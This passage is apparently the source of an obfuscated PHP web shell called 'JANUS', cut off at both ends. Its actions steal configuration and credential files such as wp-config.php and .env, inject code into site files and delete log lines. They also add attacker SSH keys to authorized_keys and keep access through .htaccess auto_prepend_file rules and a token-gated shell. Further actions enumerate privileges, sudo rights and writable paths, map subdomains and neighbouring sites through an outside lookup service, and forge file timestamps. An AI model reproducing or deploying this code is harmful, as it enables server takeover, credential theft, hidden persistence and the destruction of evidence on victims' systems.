"\116\x6f\40\x6d\x61\164\143\150\x65\163\x20\146\x6f\x75\156\x64\x20\x6f\x72\40\147\x72\x65\160\40\x69\x73\x20\x6e\x6f\164\x20\141\x76\141\151\154\141\142\x6c\145\56")]; goto nZLIB; pJ793: goto vbH70; goto t8BFP; FqsGR: $j3_hR = realpath($_POST["\x70\141\164\150"]); goto eG_fx; Icd70: if (!(!$j3_hR || !$yJHiS)) { goto Z2Mr2; } goto XKLjb; nZLIB: goto vbH70; goto mbW6B; mbW6B: case "\147\145\164\x5f\x63\x6f\x6e\x66\151\147\x73": goto ffNgo; i8zyu: goto vbH70; goto CNry6; ryaWV: Tamqw: goto FA2h8; jXiPg: $Tlf91 = []; goto a09mu; FA2h8: $v1Pog = ["\163\x74\x61\164\165\163" => "\163\x75\143\143\145\x73\163", "\143\x6f\x6e\146\x69\x67\x73" => $Tlf91]; goto i8zyu; kq6_F: $xf6uV = array_unique([realpath(getcwd()), realpath(getcwd() . "\57\x2e\x2e"), realpath(getcwd() . "\57\x2e\56\x2f\x2e\56"), realpath($_SERVER["\104\117\x43\x55\115\105\x4e\124\x5f\x52\117\117\x54"])]); goto jXiPg; a09mu: foreach ($xf6uV as $j3_hR) { goto UZl7J; LaB_I: foreach ($yPpFX as $Q0s1i) { goto WOjjF; YfVQE: V2pId: goto ds5WN; jGhUG: $KLrez = $Q0s1i->getRealPath(); goto DsBtY; bIb4v: OjHcv: goto YfVQE; WOjjF: if (!(in_array($Q0s1i->getFilename(), $oVVLx) && $Q0s1i->isReadable())) { goto OjHcv; } goto jGhUG; DsBtY: $Tlf91[$KLrez] = htmlspecialchars(file_get_contents($KLrez)); goto bIb4v; ds5WN: } goto AuQiv; WXr_R: gVfN5: goto cMvzm; AuQiv: l1IgW: goto WXr_R; UZl7J: if (!(!$j3_hR || !is_dir($j3_hR))) { goto Td1ne; } goto wvwM7; wvwM7: goto gVfN5; goto dEOis; U6fly: $yPpFX->setMaxDepth(4); goto LaB_I; dEOis: Td1ne: goto Mu3aG; Mu3aG: $yPpFX = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($j3_hR, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST); goto U6fly; cMvzm: } goto ryaWV; ffNgo: $oVVLx = ["\x77\160\x2d\x63\x6f\156\x66\x69\147\x2e\x70\150\160", "\x63\x6f\x6e\x66\x69\147\165\162\141\164\151\157\x6e\56\160\x68\x70", "\x2e\x65\156\x76", "\143\157\156\146\x69\x67\56\151\156\143\56\x70\150\160", "\163\x65\x74\164\x69\x6e\x67\163\x2e\160\150\x70", "\154\157\x63\x61\154\x2e\x78\x6d\154", "\x64\x61\164\141\142\x61\x73\145\56\x79\155\154", "\143\157\156\146\x69\x67\x2e\x70\150\160"]; goto kq6_F; CNry6: case "\x69\156\152\145\x63\x74\137\x63\157\144\145": goto hvdzv; xxoch: $RFZ8l = $_POST["\x63\157\144\145"]; goto uQauA; Mz0Ib: Hyzca: goto SHgCz; CnrdZ: $MQrUS = $ZSJX5 . PHP_EOL . $RFZ8l; goto O1SwH; eZRh3: Qxb56: goto KMwhg; E3FBt: if (is_file($j3_hR) && is_writable($j3_hR)) { goto Qxb56; } goto fZGrD; yXFPY: lPruW: goto wGe2V; fZGrD: $v1Pog["\x6d\x65\x73\163\141\147\145"] = "\x46\151\154\145\40\x6e\x6f\x74\x20\x66\157\x75\156\144\x20\157\162\40\x6e\x6f\164\40\x77\162\151\x74\x61\142\x6c\x65\x2e"; goto UQ2YN; LiXhT: $v1Pog["\155\145\163\x73\141\x67\145"] = "\x46\x69\154\145\40\x70\141\164\x68\x20\x61\x6e\x64\x20\143\157\x64\145\40\x61\x72\x65\40\162\145\161\165\x69\x72\145\x64\x2e"; goto MYDwK; O1SwH: goto onhXc; goto sBI55; Etred: onhXc: goto ktZje; tTVm9: if (!(empty($j3_hR) || empty($RFZ8l))) { goto KHjsC; } goto LiXhT; StpbI: if ($JQu7s === "\160\x72\145\x70\145\156\x64") { goto Xw7dY; } goto CnrdZ; CxqTM: goto HEzW2; goto Mz0Ib; sBI55: Xw7dY: goto hJ3_r; MYDwK: goto vbH70; goto Y9CvT; SVQ0J: HEzW2: goto yXFPY; uQauA: $JQu7s = $_POST["\x70\157\x73\x69\164\x69\x6f\x6e"]; goto tTVm9; UQ2YN: goto lPruW; goto eZRh3; ktZje: if (file_put_contents($j3_hR, $MQrUS) !== false) { goto Hyzca; } goto GwMeo; SHgCz: $v1Pog = ["\x73\164\x61\x74\165\163" => "\163\165\143\x63\x65\x73\163", "\x6d\x65\x73\163\141\147\145" => "\103\157\x64\x65\40\151\x6e\152\x65\143\164\145\144\40\163\x75\143\143\145\x73\163\x66\x75\x6c\154\x79\x20\151\x6e\164\x6f\x20" . basename($j3_hR)]; goto SVQ0J; wGe2V: goto vbH70; goto g9nw4; KMwhg: $ZSJX5 = file_get_contents($j3_hR); goto StpbI; GwMeo: $v1Pog["\x6d\145\x73\163\x61\147\145"] = "\x46\141\151\x6c\x65\x64\x20\x74\x6f\40\167\162\151\164\x65\x20\164\157\x20\x66\x69\154\x65\x2e"; goto CxqTM; hvdzv: $j3_hR = $_POST["\160\x61\164\150"]; goto xxoch; Y9CvT: KHjsC: goto E3FBt; hJ3_r: $MQrUS = $RFZ8l . PHP_EOL . $ZSJX5; goto Etred; g9nw4: case "\x6c\157\x67\x5f\143\154\145\141\x6e\x65\x72": goto Z_pAp; jC6dw: $v1Pog["\155\x65\x73\163\x61\x67\145"] = "\114\157\147\40\146\x69\154\x65\x20\141\x6e\144\x20\153\x65\171\x77\x6f\162\x64\40\141\x72\x65\40\162\x65\x71\165\151\162\145\144\x2e"; goto otfIS; Wa29Y: if (is_file($YWAsy) && is_readable($YWAsy)) { goto LECM7; } goto G8rGM; ARxDc: goto vbH70; goto axu2H; tdgnP: $c7Q3k = $_POST["\x6b\145\171\x77\x6f\162\x64"]; goto klOMK; otfIS: goto vbH70; goto cAER2; ylwdH: goto zrL5u; goto pVrni; Sfhut: $ZPr86 = array_filter($IdX4r, function ($oTjJ5) use($c7Q3k) { return strpos($oTjJ5, $c7Q3k) === false; }); goto gEIsR; cAER2: UDBxD: goto Wa29Y; AWAbr: $P2irp = count($IdX4r); goto Sfhut; F74Oa: $IdX4r = file($YWAsy, FILE_IGNORE_NEW_LINES); goto AWAbr; FSadU: zrL5u: goto ARxDc; CRJ9I: $v1Pog["\x6d\145\163\x73\141\147\145"] = "\114\x6f\147\40\x66\151\154\x65\40\151\x73\40\x6e\x6f\164\x20\167\x72\x69\164\141\x62\x6c\x65\56"; goto GyMgQ; klOMK: if (!(empty($YWAsy) || empty($c7Q3k))) { goto UDBxD; } goto jC6dw; Z_pAp: $YWAsy = $_POST["\154\157\x67\137\x66\x69\x6c\x65"]; goto tdgnP; zf1Gd: h5K20: goto F74Oa; DjXNs: file_put_contents($YWAsy, implode(PHP_EOL, $ZPr86) . PHP_EOL); goto sf01j; pVrni: LECM7: goto qZlkd; qZlkd: if (is_writable($YWAsy)) { goto h5K20; } goto CRJ9I; gEIsR: $dZfB7 = $P2irp - count($ZPr86); goto DjXNs; GyMgQ: goto vbH70; goto zf1Gd; sf01j: $v1Pog = ["\x73\x74\x61\x74\165\x73" => "\x73\x75\x63\143\145\x73\x73", "\x6d\x65\163\x73\141\147\145" => "\x52\145\x6d\157\166\145\144\x20{$dZfB7}\40\x6c\x69\x6e\145\163\40\x63\157\156\164\x61\151\156\x69\x6e\x67\x20\47{$c7Q3k}\47\40\146\x72\x6f\155\x20" . basename($YWAsy)]; goto FSadU; G8rGM: $v1Pog["\x6d\x65\x73\163\x61\x67\x65"] = "\114\157\147\x20\146\151\154\x65\40\156\x6f\164\x20\x66\157\165\x6e\144\x20\157\x72\x20\x6e\x6f\x74\40\162\145\x61\144\x61\142\154\x65\x2e"; goto ylwdH; axu2H: case "\x73\165\x64\157\137\143\150\x65\x63\x6b": goto of3gB; vsm8T: goto vbH70; goto zGDyZ; RxGhC: $v1Pog = ["\163\x74\141\x74\165\163" => "\x73\165\143\143\x65\x73\163", "\144\141\x74\141" => htmlspecialchars($BKvy0 ?: "\103\x6f\165\154\144\x20\x6e\x6f\164\40\162\165\x6e\x20\47\x73\165\144\157\x20\55\x6c\47\56")]; goto vsm8T; of3gB: $BKvy0 = zMrp5("\x73\165\144\x6f\40\x2d\x6c\40\x32\76\x26\61"); goto RxGhC; zGDyZ: case "\147\x65\x74\137\x75\x73\145\x72\x5f\143\x6f\156\x74\x65\170\x74": goto Zr18o; Zr18o: $BKvy0 = zmRP5("\x77\x68\x6f\141\155\151\x3b\x20\151\x64"); goto WAMbO; nTGhy: goto vbH70; goto MNTQi; WAMbO: $v1Pog = ["\163\164\x61\x74\x75\163" => "\x73\x75\143\143\x65\x73\163", "\144\141\164\x61" => htmlspecialchars($BKvy0 ?: "\103\157\x75\x6c\144\40\156\x6f\164\40\x72\165\x6e\x20\47\167\x68\157\x61\155\151\x27\40\157\162\x20\x27\151\144\47\56")]; goto nTGhy; MNTQi: case "\146\x69\x6e\x64\137\167\x72\x69\164\141\x62\x6c\x65": goto kHynU; omT5T: $BKvy0 = "\x2d\55\x2d\40\x57\157\x72\x6c\144\x2d\127\162\x69\x74\141\x62\154\145\40\x44\x69\x72\145\x63\164\x6f\x72\151\x65\163\x20\55\x2d\x2d\12"; goto sIM22; tvnnZ: if ($j3_hR) { goto NQ9jO; } goto TrKSA; mHTC0: NQ9jO: goto lsZUa; I7Xsk: $LcJbn = "\146\x69\156\144\x20" . escapeshellarg($j3_hR) . "\x20\55\x74\x79\160\145\x20\146\40\55\x70\x65\x72\x6d\40\x2d\x30\60\60\x32\x20\55\154\163\40\x32\x3e\x2f\144\x65\166\x2f\x6e\x75\154\154"; goto omT5T; Aller: $v1Pog = ["\x73\x74\141\164\x75\x73" => "\x73\x75\x63\x63\x65\x73\x73", "\x64\x61\x74\x61" => htmlspecialchars($BKvy0)]; goto TdDX9; ks9Eu: $BKvy0 .= zmrP5($LcJbn) ?: "\116\157\x6e\x65\x20\146\x6f\165\156\x64\x2e\12"; goto Aller; kHynU: $j3_hR = realpath($_POST["\x70\x61\x74\x68"]); goto tvnnZ; sIM22: $BKvy0 .= zmRp5($U0B2N) ?: "\116\x6f\156\x65\40\146\157\x75\x6e\x64\x2e\12"; goto XjN1e; XjN1e: $BKvy0 .= "\12\x2d\55\x2d\x20\x57\x6f\x72\154\x64\55\x57\162\151\x74\x61\x62\154\x65\40\106\x69\x6c\145\x73\40\55\55\x2d\12"; goto ks9Eu; TdDX9: goto vbH70; goto on3P5; lsZUa: $U0B2N = "\146\151\156\x64\40" . escapeshellarg($j3_hR) . "\x20\55\x74\x79\160\145\x20\144\x20\x2d\x70\x65\x72\155\40\55\x30\60\x30\62\40\55\x6c\x73\x20\62\76\x2f\x64\x65\x76\57\156\165\x6c\x6c"; goto I7Xsk; TrKSA: $v1Pog["\x6d\145\163\x73\141\x67\145"] = "\x49\x6e\166\x61\x6c\151\144\x20\160\x61\164\x68\x20\160\x72\x6f\x76\x69\144\145\144\x2e"; goto KKPpo; KKPpo: goto vbH70; goto mHTC0; on3P5: case "\163\x73\x68\137\155\141\x6e\141\x67\x65\x72": goto QZCyp; Ompkz: $v1Pog["\155\145\x73\x73\141\147\145"] = "\106\x61\151\x6c\145\x64\40\x74\x6f\40\x77\162\x69\x74\x65\x20\164\157\40\141\x75\x74\x68\x6f\162\x69\172\145\x64\137\x6b\145\x79\163\x20\146\x69\154\145\56"; goto ouvcR; lyKDw: if (!(empty($DXIyj) || !is_dir($DXIyj))) { goto gbqO8; } goto dD4J1; bQ7wr: $Lrz4Z = ''; goto lH6zN; PYUhl: if (file_put_contents($PNVBp, $dTrV6 . PHP_EOL, FILE_APPEND) !== false) { goto ZkMjI; } goto Ompkz; lH6zN: $EFvAq = false; goto Rz39o; nGu7V: if (@mkdir($ZqQ1D, 0700)) { goto ZhvaH; } goto iGmTP; nKV6K: Q4raW: goto qS34n; g1gtP: goto vbH70; goto HicM7; qjD1t: EjRwy: goto Q0OXp; QZCyp: $DXIyj = ZmRP5("\145\143\150\x6f\40\x24\x48\x4f\x4d\105"); goto aXtDo; Mjk44: $bOsry = posix_getpwuid(getmyuid()); goto clYaC; u1eu5: if (!(is_writable($PNVBp) || !file_exists($PNVBp) && is_writable($ZqQ1D))) { goto c33Lg; } goto MawsW; dD4J1: $v1Pog["\155\x65\163\163\141\147\x65"] = "\103\x6f\165\x6c\144\x20\x6e\157\x74\x20\x64\x65\x74\145\x72\x6d\151\156\145\x20\x75\163\x65\162\40\150\x6f\155\145\x20\x64\151\162\145\x63\x74\x6f\x72\x79\x2e"; goto g1gtP; poihF: u74cj: goto lyKDw; HicM7: gbqO8: goto A8hUg; c6VuW: $dTrV6 = $_POST["\x6b\x65\171"]; goto vDLO8; Rz39o: if (!(file_exists($PNVBp) && is_readable($PNVBp))) { goto MFB2K; } goto QMH3B; jYVNI: $v1Pog["\x6d\145\163\163\141\147\145"] = "\123\x53\x48\x20\x6b\x65\x79\40\143\x61\x6e\156\157\164\x20\142\x65\40\x65\155\x70\164\x79\56"; goto a2oHm; ULewT: $v1Pog = ["\x73\164\x61\x74\x75\x73" => "\x73\x75\143\143\145\163\x73", "\x6d\x65\163\163\141\147\x65" => "\x53\123\110\x20\153\x65\x79\x20\141\x64\144\145\x64\40\163\x75\143\x63\x65\163\x73\146\165\154\x6c\171\x2e"]; goto nKV6K; cPjTZ: if ($uOhnh === "\141\144\144") { goto qpHyV; } goto zbZC8; QMH3B: $Lrz4Z = file_get_contents($PNVBp); goto ukV1s; qRWOr: ZhvaH: goto Lm8M9; k_Fso: goto vbH70; goto qRWOr; jIhbZ: $v1Pog = ["\163\x74\141\x74\x75\x73" => "\x73\x75\143\x63\x65\163\x73", "\143\157\156\x74\x65\x6e\x74" => $Lrz4Z, "\167\162\x69\x74\x61\x62\154\x65" => $EFvAq, "\x70\x61\164\150" => $PNVBp]; goto LWYT4; aXtDo: $DXIyj = trim($DXIyj); goto T3c38; ZFzBH: goto vbH70; goto QN4c_; G9fje: ZkMjI: goto VXmUO; LWYT4: goto pNj48; goto w_emc; A8hUg: $ZqQ1D = $DXIyj . "\57\x2e\x73\x73\x68"; goto XbW7w; iGmTP: $v1Pog["\155\145\x73\x73\141\147\x65"] = "\x43\x6f\165\x6c\144\x20\x6e\x6f\x74\x20\143\x72\x65\x61\164\145\40\x2e\163\163\x68\x20\x64\x69\x72\145\x63\164\x6f\162\x79\56"; goto k_Fso; XbW7w: $PNVBp = $ZqQ1D . "\57\141\165\x74\150\157\162\x69\172\145\x64\137\x6b\x65\171\163"; goto RfmvL; w_emc: qpHyV: goto c6VuW; vDLO8: if (!empty($dTrV6)) { goto EjRwy; } goto jYVNI; a2oHm: goto vbH70; goto qjD1t; R0MzQ: if ($uOhnh === "\147\x65\164") { goto rDl1O; } goto cPjTZ; Lm8M9: DSbY8: goto PYUhl; UeCUq: rDl1O: goto bQ7wr; Q0OXp: if (is_dir($ZqQ1D)) { goto DSbY8; } goto nGu7V; MawsW: $EFvAq = true; goto V0yiY; T3c38: if (!empty($DXIyj)) { goto u74cj; } goto Mjk44; qS34n: pNj48: goto ZFzBH; zbZC8: goto pNj48; goto UeCUq; ukV1s: MFB2K: goto u1eu5; ouvcR: goto Q4raW; goto G9fje; clYaC: $DXIyj = $bOsry["\x64\x69\162"]; goto poihF; RfmvL: $uOhnh = $_POST["\163\165\x62\x5f\141\x63\x74\151\x6f\x6e"]; goto R0MzQ; V0yiY: c33Lg: goto jIhbZ; VXmUO: chmod($PNVBp, 0600); goto ULewT; QN4c_: case "\x68\164\141\143\143\145\163\x73\x5f\x70\x65\162\163\x69\163\x74": goto IGM3B; QgHjW: goto zIF_r; goto se3fP; xgtfw: if (!(strpos($ZSJX5, "\43\x20\112\x41\x4e\x55\123\x20\120\105\122\x53\111\x53\124\105\116\x43\x45") !== false)) { goto XgPft; } goto ifntx; ifntx: $v1Pog["\x6d\x65\x73\163\141\x67\145"] = "\120\x65\162\x73\151\163\164\145\x6e\x63\145\x20\162\x75\154\x65\x20\x61\154\x72\145\141\144\171\x20\x73\145\145\x6d\x73\40\164\157\x20\x65\x78\x69\163\164\x20\151\x6e\x20\x2e\x68\164\x61\x63\x63\145\x73\x73\56"; goto U72GR; lco6u: $sE6ux .= "\x20\x20\x20\x20\160\150\160\137\x76\141\x6c\165\145\x20\141\x75\164\x6f\137\160\x72\145\160\145\156\144\137\x66\151\x6c\145\40" . escapeshellarg($YOfeG) . "\xa"; goto DejNK; jHBXy: $YOfeG = $_POST["\x66\151\x6c\x65\156\x61\155\145"]; goto UmISH; Hm_Zv: $ZSJX5 = file_exists($rE5PO) ? file_get_contents($rE5PO) : ''; goto xgtfw; vWeVF: $v1Pog["\x6d\145\x73\163\x61\147\145"] = "\x41\40\166\141\x6c\151\144\40\144\x69\162\145\143\164\157\x72\x79\x20\160\x61\164\x68\40\x61\156\144\x20\146\151\x6c\145\x6e\141\155\x65\x20\141\162\x65\x20\x72\145\161\165\x69\162\x65\144\x2e"; goto K5DRZ; K5DRZ: goto vbH70; goto y638L; Lxl26: $sE6ux .= "\x20\40\40\40\160\150\160\x5f\166\141\x6c\165\145\x20\141\165\x74\x6f\x5f\x70\x72\145\160\x65\x6e\x64\x5f\146\x69\x6c\x65\40" . escapeshellarg($YOfeG) . "\12"; goto g6URP; npHux: if (!(!is_writable($j3_hR) || file_exists($rE5PO) && !is_writable($rE5PO))) { goto CC1Fg; } goto SN73i; lJ2ca: goto vbH70; goto gOZuD; Qm8X_: $sE6ux .= "\74\111\146\x4d\157\144\x75\x6c\x65\x20\x6d\157\x64\137\x70\x68\x70\x2e\x63\76\12"; goto lco6u; GGRG9: XgPft: goto xG9k9; eaKBl: $sE6ux .= "\x20\40\x20\40\x70\x68\x70\x5f\166\141\154\165\145\x20\x61\x75\x74\x6f\137\x70\x72\145\160\x65\x6e\x64\x5f\146\151\x6c\x65\40" . escapeshellarg($YOfeG) . "\12"; goto sJGUM; IGM3B: $j3_hR = realpath($_POST["\x70\x61\164\150"]); goto jHBXy; DejNK: $sE6ux .= "\x3c\x2f\x49\x66\115\157\144\x75\x6c\x65\x3e\12\12"; goto Hm_Zv; y638L: X5hBs: goto MP3NF; h_KUT: $v1Pog["\155\x65\x73\163\141\147\x65"] = "\x46\x61\x69\154\145\144\x20\164\x6f\x20\x77\x72\151\x74\x65\40\x74\x6f\x20\x2e\150\x74\141\x63\x63\x65\x73\x73\40\x66\x69\154\145\x2e"; goto QgHjW; U72GR: goto vbH70; goto GGRG9; HWqBM: $sE6ux .= "\74\111\146\x4d\157\x64\x75\154\145\40\x6d\157\x64\137\160\x68\x70\65\56\143\x3e\12"; goto Lxl26; se3fP: Dk3Va: goto FuN34; fKud_: $sE6ux .= "\74\x49\146\x4d\x6f\x64\x75\154\145\40\x6d\x6f\144\x5f\160\x68\x70\x37\x2e\143\x3e\12"; goto eaKBl; zNLI9: goto vbH70; goto QEvQf; g6URP: $sE6ux .= "\x3c\x2f\x49\x66\x4d\x6f\x64\x75\154\x65\76\xa"; goto fKud_; sJGUM: $sE6ux .= "\74\x2f\111\x66\x4d\x6f\x64\x75\x6c\145\x3e\12"; goto Qm8X_; MP3NF: $rE5PO = $j3_hR . "\x2f\x2e\x68\164\x61\143\x63\x65\163\163"; goto npHux; v7p01: $sE6ux = "\43\x20\x4a\101\116\125\x53\40\120\x45\x52\123\111\123\124\x45\x4e\103\x45\xa"; goto HWqBM; xG9k9: if (file_put_contents($rE5PO, $sE6ux . $ZSJX5) !== false) { goto Dk3Va; } goto h_KUT; FuN34: $v1Pog = ["\x73\x74\x61\164\165\163" => "\x73\165\x63\143\145\163\x73", "\x6d\145\x73\x73\141\147\145" => "\120\x65\x72\x73\x69\163\x74\x65\156\x63\145\x20\x72\x75\x6c\x65\x20\141\x64\144\x65\x64\40\x74\157\40" . $rE5PO]; goto eI8J6; SN73i: $v1Pog["\x6d\145\x73\163\141\147\x65"] = "\x54\x61\x72\x67\145\x74\x20\144\151\x72\145\143\164\x6f\x72\171\40\x6f\x72\40\145\x78\x69\163\x74\x69\156\x67\40\x2e\150\164\x61\x63\143\145\x73\163\40\151\163\40\156\x6f\164\40\167\162\x69\x74\x61\x62\154\145\56"; goto lJ2ca; eI8J6: zIF_r: goto zNLI9; gOZuD: CC1Fg: goto v7p01; UmISH: if (!(!$j3_hR || !is_dir($j3_hR) || empty($YOfeG))) { goto X5hBs; } goto vWeVF; QEvQf: case "\x63\x72\x65\x61\164\145\137\150\x74\141\143\x63\145\163\163": goto AOjDf; GuMtR: $nglsT = @yZbXG($qY16M); goto gci6o; HtWlN: $v1Pog = ["\163\164\141\x74\x75\163" => "\163\165\x63\143\145\163\x73", "\155\145\163\163\x61\x67\x65" => "\x2e\150\x74\x61\143\x63\145\x73\x73\x20\x70\x72\157\x74\145\x63\164\x69\157\156\x20\143\162\145\141\x74\145\x64\x20\x73\x75\x63\x63\x65\x73\163\x66\165\x6c\154\171\x21", "\150\164\141\143\x63\145\163\x73\137\x70\141\x74\150" => $nglsT["\x68\164\x61\x63\143\x65\163\x73\x5f\160\141\x74\150"], "\163\145\143\162\145\x74\137\164\x6f\x6b\x65\156" => $nglsT["\x73\x65\x63\162\x65\x74\137\x74\157\153\145\x6e"], "\x69\x6e\x66\157" => "\x41\x63\x63\x65\x73\163\x20\x73\150\x65\154\154\x20\167\151\x74\x68\x3a\x20\x3f\x6a\141\156\165\x73\x5f\164\x6f\x6b\x65\x6e\75" . $nglsT["\x73\x65\x63\x72\x65\164\x5f\164\x6f\153\145\x6e"]]; goto PVVjv; Umx0E: RzTZK: goto HtWlN; Noa3j: $v1Pog["\x6d\145\x73\x73\141\147\x65"] = isset($nglsT["\155\145\x73\x73\141\x67\x65"]) ? $nglsT["\x6d\145\x73\x73\141\147\145"] : "\106\141\151\154\145\x64\x20\x74\x6f\x20\143\x72\x65\x61\x74\x65\40\x2e\150\x74\141\x63\x63\x65\x73\x73\40\160\162\157\x74\145\143\x74\x69\157\x6e\x2e"; goto Yof1Q; jo2nY: goto vbH70; goto ep3qO; fYcUn: if (!(empty($qY16M) || !file_exists($qY16M))) { goto i0nkc; } goto p3XNk; Yof1Q: goto BAjlN; goto Umx0E; AOjDf: $qY16M = isset($_POST["\163\x68\x65\154\154\x5f\x70\x61\x74\x68"]) ? $_POST["\x73\150\x65\154\154\137\160\141\x74\150"] : __FILE__; goto fYcUn; vm8ws: i0nkc: goto GuMtR; PVVjv: BAjlN: goto jo2nY; gci6o: if ($nglsT && $nglsT["\163\164\141\164\165\163"] === "\163\x75\x63\x63\145\163\x73") { goto RzTZK; } goto Noa3j; p3XNk: $v1Pog["\x6d\145\x73\163\141\x67\145"] = "\x49\x6e\x76\141\154\151\x64\x20\163\x68\x65\x6c\x6c\x20\x70\x61\x74\150\56"; goto Qvnc9; Qvnc9: goto vbH70; goto vm8ws; ep3qO: case "\147\x65\x74\x5f\144\x6f\155\141\151\x6e\x5f\x69\156\164\145\x6c": goto kYOXw; S5AHC: kaBGx: goto vYJ12; RNcrM: Oam8w: goto eXSXn; NlW3Y: $d2pvm = stream_context_create($VkUQu); goto sjbsI; JnnM5: $NFCPX = filter_var($NFCPX, FILTER_SANITIZE_URL); goto H_SM4; kYOXw: $NFCPX = isset($_SERVER["\123\105\122\126\x45\122\137\116\x41\115\x45"]) ? $_SERVER["\123\x45\x52\126\105\x52\x5f\116\101\115\x45"] : (isset($_SERVER["\123\105\122\x56\x45\122\137\101\x44\x44\x52"]) ? $_SERVER["\x53\x45\x52\126\x45\x52\137\101\x44\104\x52"] : ''); goto t4qPL; YwRDj: goto vbH70; goto hwoPC; h1mcH: $vK3uJ = ["\167\x77\x77", "\x6d\x61\151\154", "\146\164\160", "\x63\160\x61\x6e\145\x6c", "\167\145\x62\155\x61\x69\x6c", "\x64\x65\166", "\x74\x65\x73\164", "\142\x6c\x6f\x67", "\163\x68\x6f\160", "\x6f\167\141", "\141\165\x74\x6f\x64\x69\x73\x63\157\x76\145\x72", "\x76\160\156", "\x6d"]; goto sEWms; eysRF: $v1Pog["\x6d\145\163\163\x61\x67\x65"] = "\103\x6f\165\154\144\40\156\x6f\x74\40\x64\x65\x74\x65\162\155\x69\156\x65\40\163\x65\x72\x76\x65\x72\x20\150\x6f\x73\x74\x6e\x61\155\x65\x20\x6f\x72\40\x49\x50\x2e"; goto YwRDj; wjj0c: qwZDB: goto PA2Ds; hwoPC: GEzty: goto JnnM5; H_SM4: $b_GfI = @gethostbyname($NFCPX); goto oaGQH; jgwbO: goto vbH70; goto Yj6c0; PA2Ds: $x9ifG = "\x41\x50\111\40\x72\145\161\x75\x65\163\164\40\x66\x61\x69\154\x65\144\x20\157\x72\40\x68\x6f\x73\x74\x20\x69\163\x20\156\157\x74\x20\x6f\156\40\x73\x68\x61\x72\x65\x64\x20\150\x6f\x73\164\x69\156\x67\x2e"; goto TJ0dg; cvIuk: $c0OAM = z0Nvp(); goto GP5Kq; AMb99: if (!($KxWA5 !== false && !empty(trim($KxWA5)))) { goto Oam8w; } goto cVXUI; t4qPL: if (!empty($NFCPX)) { goto GEzty; } goto eysRF; cVXUI: $x9ifG = htmlspecialchars(trim($KxWA5)); goto RNcrM; sjbsI: $KxWA5 = @file_get_contents($V8M_r, false, $d2pvm); goto AMb99; PhV28: $iLm_W = []; goto wjj0c; sOBTf: if (!($iLm_W === false)) { goto qwZDB; } goto PhV28; oaGQH: $iLm_W = @dns_get_record($NFCPX, DNS_ANY); goto sOBTf; vYJ12: $v1Pog = ["\x73\x74\141\164\x75\x73" => "\163\165\143\143\145\163\x73", "\x69\156\164\145\154" => ["\x68\x6f\163\164" => $NFCPX, "\x69\160" => $b_GfI, "\144\156\x73\x5f\x72\x65\x63\x6f\162\144\x73" => $iLm_W, "\x6f\164\150\x65\162\x5f\163\151\164\145\163" => $x9ifG, "\146\157\x75\156\x64\137\163\x75\x62\x64\157\155\141\x69\x6e\x73" => $itBdb]]; goto jgwbO; TJ0dg: $V8M_r = "\x68\x74\x74\160\163\72\57\x2f\141\x70\x69\56\150\x61\x63\153\145\x72\x74\141\162\x67\x65\164\56\x63\x6f\x6d\x2f\x72\145\166\145\x72\x73\145\x69\x70\x6c\157\x6f\x6b\165\x70\57\x3f\x71\75" . urlencode($b_GfI); goto cvIuk; GP5Kq: $VkUQu = ["\163\x73\154" => ["\166\x65\162\x69\x66\171\x5f\160\145\145\x72" => false, "\x76\145\x72\x69\146\171\x5f\x70\x65\x65\162\x5f\156\x61\x6d\145" => false], "\x68\x74\x74\x70" => ["\165\163\145\162\x5f\141\x67\x65\x6e\164" => $c0OAM, "\164\x69\155\x65\157\165\164" => 15, "\146\x6f\x6c\x6c\x6f\167\x5f\154\157\143\141\x74\151\157\156" => true, "\155\x61\170\x5f\x72\x65\x64\151\162\145\143\164\163" => 3]]; goto NlW3Y; eXSXn: $itBdb = []; goto h1mcH; sEWms: foreach ($vK3uJ as $LQmze) { goto TOh1u; TOh1u: $aDkWK = $LQmze . "\x2e" . $NFCPX; goto GJYZx; o56lf: if (!($mRz2l != $aDkWK && $mRz2l !== false)) { goto EVOaf; } goto XvKBs; XvKBs: $itBdb[] = $aDkWK; goto sL2Kp; ImVzz: YHnOr: goto C9pqm; GJYZx: $mRz2l = @gethostbyname($aDkWK); goto o56lf; sL2Kp: EVOaf: goto ImVzz; C9pqm: } goto S5AHC; Yj6c0: case "\164\x69\155\145\163\x74\157\x6d\160": goto pkZeg; wC5y6: $v1Pog["\155\x65\x73\163\x61\147\x65"] = "\106\x61\151\154\145\x64\x20\164\157\40\x63\x68\141\x6e\x67\x65\x20\164\151\155\145\x73\164\141\155\160\56"; goto JgEQ1; Q_FCA: UaEog: goto zUw0c; qEzR_: Zs19T: goto zKD9Q; zKD9Q: $b3Akw = filemtime($bw9Jt); goto RDIFa; zjsSl: nX2Vl: goto lwLWK; Pf3vm: if (!(!file_exists($bw9Jt) || !is_readable($bw9Jt))) { goto nX2Vl; } goto hgdjV; JgEQ1: goto UaEog; goto JmqZp; lwLWK: if (!(!file_exists($N2IKz) || !is_writable($N2IKz))) { goto Zs19T; } goto aJPrN; zUw0c: goto vbH70; goto dyHUg; hgdjV: $v1Pog["\155\145\163\163\x61\147\145"] = "\x53\x6f\165\162\143\145\40\x66\x69\x6c\x65\x20\144\x6f\145\x73\x20\156\157\x74\x20\145\170\x69\x73\164\x20\157\x72\40\151\163\x20\156\157\164\x20\162\x65\141\x64\141\142\154\145\x2e"; goto rnbhd; wpwmc: $N2IKz = $_POST["\x64\145\x73\164"]; goto Pf3vm; plijk: $v1Pog = ["\163\164\x61\x74\165\x73" => "\x73\x75\143\x63\145\x73\163", "\x6d\145\x73\x73\141\x67\145" => "\x54\151\155\x65\163\x74\x61\x6d\x70\x20\x6f\x66\40" . basename($N2IKz) . "\40\143\150\x61\156\147\x65\144\x20\x74\157\x20\x6d\141\164\x63\150\40" . basename($bw9Jt) . "\x2e"]; goto Q_FCA; pkZeg: $bw9Jt = $_POST["\x73\x6f\x75\x72\143\145"]; goto wpwmc; xNuhK: goto vbH70; goto qEzR_; JmqZp: NRfOc: goto plijk; rnbhd: goto vbH70; goto zjsSl; RDIFa: if (touch($N2IKz, $b3Akw)) { goto NRfOc; } goto wC5y6; aJPrN: $v1Pog["\155\145\163\x73\x61\147\145"] = "\x44\145\163\164\151\156\x61\164\x69\x6f\156\x20\146\x69\154\145\x20\x64\157\145\x73\x20\x6e\157\x74\x20\145\x78\151\163\164\x20\x6f\x72\x20\x69\163\x20\x6e\x6f\164\40\167\162\151\x74\141\x62\x6c\x65\x2e"; goto xNuhK; dyHUg: case 